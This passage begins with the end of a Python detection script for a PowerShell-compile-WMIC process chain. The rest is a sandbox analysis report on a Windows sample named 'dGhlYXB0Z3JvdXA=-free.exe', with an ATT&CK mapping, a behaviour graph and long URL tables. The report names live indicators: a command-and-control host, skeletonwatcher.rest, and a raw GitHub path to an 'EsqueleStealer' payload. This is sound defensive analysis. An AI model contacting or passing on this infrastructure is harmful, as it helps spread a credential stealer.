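     "parent_image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "command_line": f'"{CSC}" /noconfig @"C:\\src\\app\\obj\\Debug\\app.cmdline"'},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(e["pid"], e["image"].rsplit("\\", 1)[-1], classify(e))
    print("chain found under parent PID(s):", correlate(EVENTS))
```

The single-event rules are deliberately loose (Add-Type in any admin script will trip csc_compile_from_temp), which is why correlate() only raises the alert when all three behaviours sit under one parent; on the constructed events only PID 6004 qualifies, and neither benign look-alike produces a hit.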
      MITRE ATT&CK mapping (reconstructed from the report's matrix; the number is the count of matched signatures per technique, and the technique names the matrix shows without a count are the template's placeholder cells, not findings):

      Execution: Windows Management Instrumentation (1), Command and Scripting Interpreter (22), PowerShell (1)
      Persistence: DLL Side-Loading (1)
      Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
      Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), DLL Side-Loading (1)
      Discovery: Security Software Discovery (11), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), System Information Discovery (22)
      Collection: Archive Collected Data (1)
      Command and Control: Encrypted Channel (12), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (4)
      No signatures were mapped to Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
      Behavior graph (ID 1583221, sample dGhlYXB0Z3JvdXA=-free.exe, start date 02/01/2025, architecture WINDOWS, score 72), rendered as text:

      dGhlYXB0Z3JvdXA=-free.exe (signature: Encrypted powershell cmdline option found)
        -> raw.githubusercontent.com 185.199.110.133:443 (FASTLYUS, Netherlands), local port 49214
        -> skeletonwatcher.rest 188.114.97.3:80 (CLOUDFLARENETUS, European Union), local port 49285
        -> powershell.exe (drops C:\Users\user\AppData\...\at4aznwk.cmdline, Unicode)
             -> csc.exe (drops C:\Users\user\AppData\Local\...\at4aznwk.dll, PE32) -> cvtres.exe
        -> powershell.exe
             -> csc.exe (drops C:\Users\user\AppData\Local\...\f2b3v2t5.dll, PE32) -> cvtres.exe
        -> WMIC.exe
        -> conhost.exe

      Graph-level signatures: Malicious sample detected (through community Yara rule); Yara detected Powershell decode and execute; Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet; 2 other signatures.

      Antivirus detection, initial sample

      Source | Detection | Scanner | Label | Link
      dGhlYXB0Z3JvdXA=-free.exe | 0% | ReversingLabs | |
      dGhlYXB0Z3JvdXA=-free.exe | 0% | Virustotal | |

      No Antivirus matches (reported for each of the three remaining sample tables)

      URL reputation (every entry below: Detection 0%, Scanner Avira URL Cloud, Label safe)

      https://dom.spec.whatwg.org/#get-the-parent
      https://streams.spec.whatwg.org/
      https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata
      https://fetch.spec.whatwg.org/#concept-headers-append
      https://url.spec.whatwg.org/#port-state
      https://fetch.spec.whatwg.org/#concept-network-error
      https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke
      http://skeletonwatcher.rest/api/get/free6
      https://fetch.spec.whatwg.org/#concept-headers-fill
      https://fetch.spec.whatwg.org/#forbidden-response-header-name
      https://dom.spec.whatwg.org/#concept-event-listener-invoke
      https://w3c.github.io/permissions/#permissionstatus
      https://dom.spec.whatwg.org/#retarget
      https://w3c.github.io/permissions/#permission-descriptor
      https://dl.deno.land/canary/
      https://crbug.com/v8/8520turbo_fast_api_callsenable
      https://w3c.github.io/permissions/#status-of-a-permission
      https://fetch.spec.whatwg.org/#body-mixin
      https://fetch.spec.whatwg.org/#concept-heade
      https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.
      http://skeletonwatcher.rest/api/get/freeM
      https://w3c.github.io/FileAPI/
      https://url.spec.whatwg.org/#idna
      https://dom.spec.whatwg.org/#concept-event-path-append
      https://wicg.github.io/import-maps/
      https://dl.deno.land/canary-latest.txt
      https://w3c.github.io/user-timing)
      https://dom.spec.whatwg.org/#event-path
      https://some/file.ts
      https://dl.deno.land/canary/P
      https://fetch.spec.whatwg.org/#concept-construct-readablestream
      https://fetch.spec.whatwg.org/#dom-headers

      Note: apart from the two skeletonwatcher.rest entries, these are WHATWG/W3C specification links, dl.deno.land and v8.dev references that appear to be strings of a bundled Deno/V8 JavaScript runtime recovered from the sample's memory, not destinations contacted during analysis; the only hosts actually contacted are skeletonwatcher.rest and raw.githubusercontent.com (see the domain table). The "safe" Avira URL Cloud verdict on http://skeletonwatcher.rest/api/get/free is a reputation-feed result and does not outweigh the observed behaviour.
      Contacted domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      skeletonwatcher.rest | 188.114.97.3 | true | false | | unknown
      raw.githubusercontent.com | 185.199.110.133 | true | false | | high
      URLs from memory and strings

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://skeletonwatcher.rest/api/get/free6 | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354926565.000001639157A000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360169025.000001639157A000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2357338443.000001639157A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://www.rapidtables.com/convert/color/hsl-to-rgb.html | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://fetch.spec.whatwg.org/#concept-headers-append | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
      https://deno.land/std/examples/colors.tsGenerate | dGhlYXB0Z3JvdXA=-free.exe | false | | high
      https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.js | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://url.spec.whatwg.org/#special-scheme | dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  high
                  https://fetch.spec.whatwg.org/#forbidden-response-header-namedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://fetch.spec.whatwg.org/#concept-network-errordGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://url.spec.whatwg.org/#port-statedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://fetch.spec.whatwg.org/#concept-headers-filldGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/denoland/deno/issuesdGhlYXB0Z3JvdXA=-free.exefalse
                    high
                    https://streams.spec.whatwg.org/dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://fetch.spec.whatwg.org/#ref-for-dom-body-formdatadGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/beatgammit/base64-jsdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://deno.land/x/example/types.d.tsdGhlYXB0Z3JvdXA=-free.exefalse
                        high
                        https://deno.land/std/fmt/colors.tsdGhlYXB0Z3JvdXA=-free.exefalse
                          high
                          https://console.spec.whatwg.org/#console-namespacedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://no-color.org/dGhlYXB0Z3JvdXA=-free.exefalse
                              high
                              https://www.npmjs.com/package/tslib).dGhlYXB0Z3JvdXA=-free.exefalse
                                high
                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/InstancdGhlYXB0Z3JvdXA=-free.exefalse
                                  high
                                  https://dom.spec.whatwg.org/#get-the-parentdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://w3c.github.io/permissions/#permissionstatusdGhlYXB0Z3JvdXA=-free.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://deno.land/x/dGhlYXB0Z3JvdXA=-free.exefalse
                                    high
                                    https://dom.spec.whatwg.org/#concept-event-listener-invokedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2259938507.00000254C8F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2259938507.00000254C8DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C3901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                        high
                                        https://crbug.com/v8/8520turbo_fast_api_callsenabledGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScopedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://deno.land/manual/runtime/compiler_apis#denobundle).dGhlYXB0Z3JvdXA=-free.exefalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2234723049.00000254B8D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380006000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/bitinn/node-fetch/blob/master/src/headers.jsdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErrdGhlYXB0Z3JvdXA=-free.exefalse
                                                  high
                                                  https://w3c.github.io/permissions/#status-of-a-permissiondGhlYXB0Z3JvdXA=-free.exefalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://developer.mozilla.org/)dGhlYXB0Z3JvdXA=-free.exefalse
                                                    high
                                                    https://dl.deno.land/canary/dGhlYXB0Z3JvdXA=-free.exefalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://fetch.spec.whatwg.org/#body-mixindGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/inexorabletash/text-encodingdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://go.micropowershell.exe, 00000003.00000002.2234723049.00000254B99B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://w3c.github.io/permissions/#permission-descriptordGhlYXB0Z3JvdXA=-free.exefalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://dom.spec.whatwg.org/#retargetdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://fetch.spec.whatwg.org/#concept-headedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360315901.00000163915A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://golang.org/pkg/bytes/#Buffer.Grow).dGhlYXB0Z3JvdXA=-free.exefalse
                                                                high
                                                                https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.dGhlYXB0Z3JvdXA=-free.exefalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compiledGhlYXB0Z3JvdXA=-free.exefalse
                                                                    high
                                                                    https://www.catcert.net/verarreldGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2357438412.000001638FCCF000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2080784374.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2081890549.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2073373495.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2073373495.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2358901034.000001638FCE4000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2081890549.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2080784374.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355062459.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354104881.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2051442764.000001638FCE1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2051442764.000001638FCC1000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2359924565.000001638FCCF000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354239815.000001638FCCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://myserver.comdGhlYXB0Z3JvdXA=-free.exefalse
                                                                        high
                                                                        https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt):dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2246660024.0000019908482000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://w3c.github.io/FileAPI/dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://golang.org/pkg/bytes/#Buffer).dGhlYXB0Z3JvdXA=-free.exefalse
                                                                            high
                                                                            https://github.com/beatgammit/base64-js/issues/42dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://url.spec.whatwg.org/#idnadGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://dom.spec.whatwg.org/#concept-event-path-appenddGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://github.com/Microsoft/TypeScript/issues/2577)dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                high
                                                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                  high
                                                                                  https://github.com/golang/go/blob/master/LICENSEdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/CompiledGhlYXB0Z3JvdXA=-free.exefalse
                                                                                      high
                                                                                      http://skeletonwatcher.rest/api/get/freeMdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2356660926.0000019908702000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://github.com/WICG/import-maps#the-import-mapSetdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                        high
                                                                                        http://man7.org/linux/man-pages/man2/shutdown.2.htmldGhlYXB0Z3JvdXA=-free.exefalse
                                                                                          high
                                                                                          https://wicg.github.io/import-maps/dGhlYXB0Z3JvdXA=-free.exefalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://html4/loose.dtddGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                            high
                                                                                            https://github.com/ctz/webpki-rootsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                              high
                                                                                              https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2340032549.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247169138.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247371351.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2356439385.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                high
                                                                                                http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validatdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                    high
                                                                                                    https://deno.land/std/examples/cat.tsdGhlYXB0Z3JvdXA=-free.exefalse
                                                                                                      high
                                                                                                      https://tools.ietf.org/html/rfc2046#section-5.1dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/github/fetch/blob/master/fetch.jsdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://contoso.com/Licensepowershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
